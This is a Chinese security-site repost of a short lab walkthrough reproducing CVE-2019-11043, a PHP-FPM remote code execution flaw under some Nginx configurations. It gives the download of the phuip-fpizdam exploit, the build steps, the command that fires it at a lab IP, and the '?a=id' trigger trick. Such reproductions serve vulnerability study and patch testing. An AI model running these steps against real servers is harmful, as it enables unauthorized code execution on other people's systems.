1. 威客安全首页
  2. 安全资讯

CVE-2019-11043远程代码执行漏洞复现

漏洞位置:

  • 提示

    任意PHP文件都可以,只要是使用go语言脚本攻击过的即可
    本例子中为index.php

漏洞详情:

  • 描述

    在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
  • 注意

    1.因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程。
    2.命令执行没办法传回有回显的信息,比如ifconfig等命令
  • 版本

    php-fpm + Nginx

请求方式:

GET

POC:

  • 下载poc包

    https://github.com/neex/phuip-fpizdam/archive/master.zip
  • 安装GO语言环境包

    https://studygolang.com/dl/golang/go1.13.3.windows-amd64.msi
  • 进入文件进行编译

    go build

CVE-2019-11043远程代码执行漏洞复现

  • 对网站发送payload

    phuip-fpizdam.exe "http://192.168.0.149:8080/index.php"

CVE-2019-11043远程代码执行漏洞复现

  • 复现效果

    CVE-2019-11043远程代码执行漏洞复现

    CVE-2019-11043远程代码执行漏洞复现

参考文章

原文链接:https://www.secpulse.com/archives/116446.html

本站声明:网站内容来源于安全脉搏如有侵权,请联系我们,我们将及时处理。

本文转为转载文章,本文观点不代表威客安全立场。

联系我们

4006-119-120

在线咨询:点击这里给我发消息

邮件:public@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

X